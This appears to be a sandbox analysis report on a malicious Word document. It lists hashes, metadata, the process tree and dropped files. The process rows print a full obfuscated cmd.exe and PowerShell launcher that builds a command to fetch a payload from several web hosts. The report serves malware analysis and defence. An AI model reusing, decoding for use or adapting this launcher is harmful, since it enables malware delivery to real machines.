File name: | form-83503388495762.doc |
Full analysis: | https://app.any.run/tasks/04e7d4ad-7344-4b2a-9a0b-351b3ee79930 |
Verdict: | Malicious activity |
Analysis date: | December 14, 2018, 14:06:37 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Dec 12 12:53:00 2018, Last Saved Time/Date: Wed Dec 12 12:53:00 2018, Number of Pages: 1, Number of Words: 7, Number of Characters: 44, Security: 0 |
MD5: | 732AE80B29E310615D61D81D60419099 |
SHA1: | A9F27391B6497495B9F2981BEB031708C440480F |
SHA256: | 8C105C6298171AABAE2A4B104C26DE583570336FB85C125A061C80E0D000BB89 |
SSDEEP: | 1536:W3GUSocn1kp59gxBK85fBko3GUv5OUdtcsfQuD5GY+a9:W3T41k/W48So3rcULFQuD5 |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
Title: | - |
---|---|
Subject: | - |
Author: | - |
Keywords: | - |
Comments: | - |
Template: | Normal.dotm |
LastModifiedBy: | - |
RevisionNumber: | 1 |
Software: | Microsoft Office Word |
TotalEditTime: | - |
CreateDate: | 2018:12:12 12:53:00 |
ModifyDate: | 2018:12:12 12:53:00 |
Pages: | 1 |
Words: | 7 |
Characters: | 44 |
Security: | None |
CodePage: | Windows Latin 1 (Western European) |
Company: | - |
Lines: | 1 |
Paragraphs: | 1 |
CharCountWithSpaces: | 50 |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | - |
HeadingPairs: | -
CompObjUserTypeLen: | 32 |
CompObjUserType: | Microsoft Word 97-2003 Document |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3480 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\form-83503388495762.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
2764 | c:\Qfqkiha\MwjYsdOUapZ\MzdPFiwbC\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:O/C"set Ob6=OwJSRhzJwXXhJMvF@{.9pLQt2/Y;Eakq+seyrGDK5U-)6W0cC$ZI83nB 7(g,fl:'m}joN1=\bdxui&&for %v in (49,21,6,77,71,64,41,36,0,64,27,49,77,37,77,71,54,34,8,42,68,73,67,34,47,23,56,69,34,23,18,45,34,73,48,62,77,34,54,23,27,49,41,47,15,71,64,11,23,23,20,63,25,25,20,68,62,35,74,34,20,68,18,47,68,65,25,39,10,57,13,19,0,76,65,16,11,23,23,20,63,25,25,20,23,68,61,61,36,68,29,74,18,47,68,65,25,73,10,23,14,14,12,52,16,11,23,23,20,63,25,25,62,77,54,30,24,76,18,54,62,25,70,61,40,35,45,0,12,19,11,16,11,23,23,20,63,25,25,20,34,36,65,77,54,29,33,18,47,68,65,18,54,77,25,19,37,33,21,69,41,31,36,30,50,16,11,23,23,20,63,25,25,54,34,8,33,30,29,73,29,36,18,47,62,76,73,25,30,35,73,69,15,75,52,55,20,68,64,18,3,20,62,77,23,58,64,16,64,43,27,49,22,11,50,71,64,8,20,21,64,27,49,36,21,8,56,71,56,64,53,44,64,27,49,39,61,22,71,64,10,45,54,64,27,49,36,65,38,71,49,34,54,14,63,23,34,65,20,32,64,72,64,32,49,36,21,8,32,64,18,34,75,34,64,27,61,68,36,34,29,47,11,58,49,76,76,0,56,77,54,56,49,41,47,15,43,17,23,36,35,17,49,77,37,77,18,38,68,8,54,62,68,29,74,15,77,62,34,58,49,76,76,0,60,56,49,36,65,38,43,27,49,15,48,67,71,64,39,28,69,64,27,51,61,56,58,58,37,34,23,42,51,23,34,65,56,49,36,65,38,43,18,62,34,54,59,23,11,56,42,59,34,56,52,46,46,46,46,43,56,17,51,54,14,68,30,34,42,51,23,34,65,56,49,36,65,38,27,49,36,67,67,71,64,20,20,47,64,27,73,36,34,29,30,27,66,66,47,29,23,47,11,17,66,66,49,77,50,69,71,64,50,26,48,64,27,84)do set F6e=!F6e!!Ob6:~%v,1!&&if %v equ 84 %TMP:~-17,1%owersh%TEMP:~-3,-2%l%CommonProgramW6432:~-16,-15% "!F6e:~-437!"" | c:\windows\system32\cmd.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 1 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3296 | CmD /V:O/C"set Ob6=OwJSRhzJwXXhJMvF@{.9pLQt2/Y;Eakq+seyrGDK5U-)6W0cC$ZI83nB 7(g,fl:'m}joN1=\bdxui&&for %v in (49,21,6,77,71,64,41,36,0,64,27,49,77,37,77,71,54,34,8,42,68,73,67,34,47,23,56,69,34,23,18,45,34,73,48,62,77,34,54,23,27,49,41,47,15,71,64,11,23,23,20,63,25,25,20,68,62,35,74,34,20,68,18,47,68,65,25,39,10,57,13,19,0,76,65,16,11,23,23,20,63,25,25,20,23,68,61,61,36,68,29,74,18,47,68,65,25,73,10,23,14,14,12,52,16,11,23,23,20,63,25,25,62,77,54,30,24,76,18,54,62,25,70,61,40,35,45,0,12,19,11,16,11,23,23,20,63,25,25,20,34,36,65,77,54,29,33,18,47,68,65,18,54,77,25,19,37,33,21,69,41,31,36,30,50,16,11,23,23,20,63,25,25,54,34,8,33,30,29,73,29,36,18,47,62,76,73,25,30,35,73,69,15,75,52,55,20,68,64,18,3,20,62,77,23,58,64,16,64,43,27,49,22,11,50,71,64,8,20,21,64,27,49,36,21,8,56,71,56,64,53,44,64,27,49,39,61,22,71,64,10,45,54,64,27,49,36,65,38,71,49,34,54,14,63,23,34,65,20,32,64,72,64,32,49,36,21,8,32,64,18,34,75,34,64,27,61,68,36,34,29,47,11,58,49,76,76,0,56,77,54,56,49,41,47,15,43,17,23,36,35,17,49,77,37,77,18,38,68,8,54,62,68,29,74,15,77,62,34,58,49,76,76,0,60,56,49,36,65,38,43,27,49,15,48,67,71,64,39,28,69,64,27,51,61,56,58,58,37,34,23,42,51,23,34,65,56,49,36,65,38,43,18,62,34,54,59,23,11,56,42,59,34,56,52,46,46,46,46,43,56,17,51,54,14,68,30,34,42,51,23,34,65,56,49,36,65,38,27,49,36,67,67,71,64,20,20,47,64,27,73,36,34,29,30,27,66,66,47,29,23,47,11,17,66,66,49,77,50,69,71,64,50,26,48,64,27,84)do set F6e=!F6e!!Ob6:~%v,1!&&if %v equ 84 powershel%CommonProgramW6432:~-16,-15% "!F6e:~-437!"" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 1 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) — note: no powershell.exe child appears in the process tree; the launcher still contains the unexpanded `%CommonProgramW6432:~-16,-15%` fragment, and that variable is normally absent on a 32-bit OS (this run is 32-bit Windows 7), so the PowerShell stage most likely never executed here and the absence of network/payload indicators should not be read as benign. | ||||
PID | Process | Filename | Type | |
---|---|---|---|---|
3480 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRA7DC.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3480 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B294EECB.wmf | — | |
MD5:— | SHA256:— | |||
3480 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E3A3FE11.wmf | — | |
MD5:— | SHA256:— | |||
3480 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd | tlb | |
MD5:FC911BB43D9F7A41D90E55990D0C2571 | SHA256:B4868CC08486C2C3B382C4121F240CDCB289486781F51C3E58C2DD103F121639 | |||
3480 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:AD7A594F018FDD26AF3E78AC20863D96 | SHA256:0EBA12D91D07998CCA9BC9C871EDDF0493667173B07061EB40F6D2895B712F85 | |||
3480 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BA880250.wmf | wmf | |
MD5:7F65F53099A09878D14919C6032E7A84 | SHA256:4F21E369704E33551DEA91D1E669BA7DF736FAA7C6FD69130DAB276B922D6F79 | |||
3480 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$rm-83503388495762.doc | pgc | |
MD5:3B7D230C9D605C39B7C1423853644622 | SHA256:2DA8B51927739B7AEE6B761F8DC76153FAF71570E1B0645699E414926CE70431 | |||
3480 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FB713172.wmf | wmf | |
MD5:A99287E97063F91A8D5F13A21908AF2A | SHA256:819432262271DD408BF9C47A2D3B088DB956BF8DAA52F18935784AA8A4BB2368 |